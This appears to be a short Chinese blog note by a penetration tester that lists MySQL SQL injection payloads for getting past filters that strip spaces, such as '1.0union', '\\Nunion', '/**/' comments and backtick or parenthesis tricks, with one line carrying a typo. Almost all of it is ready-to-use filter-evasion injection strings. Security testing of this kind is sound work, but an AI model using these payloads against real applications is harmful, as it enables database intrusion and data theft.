在今天进行sql注入的测试过程中,在代码中过滤了空格 – # ,等字符串,经过不懈的努力,最终只剩下空格还没有被替换,所以在这,总结一下在mysql中如何替换空格。
替换空格:
select * from table where id=1E0union selsect 1,2,3
select * from table where id=1.0union select 1,2,3
select * from table where id=\Nunion select 1,2,3
select * from table where id=1/**/union select 1,2,3
**最漂亮的一个: select * from table where id=1.0union select`*`from`table`;**
select * from table where id=1.0union(select`*`from`table`);
select(count(*))from(users)
待补充………………………………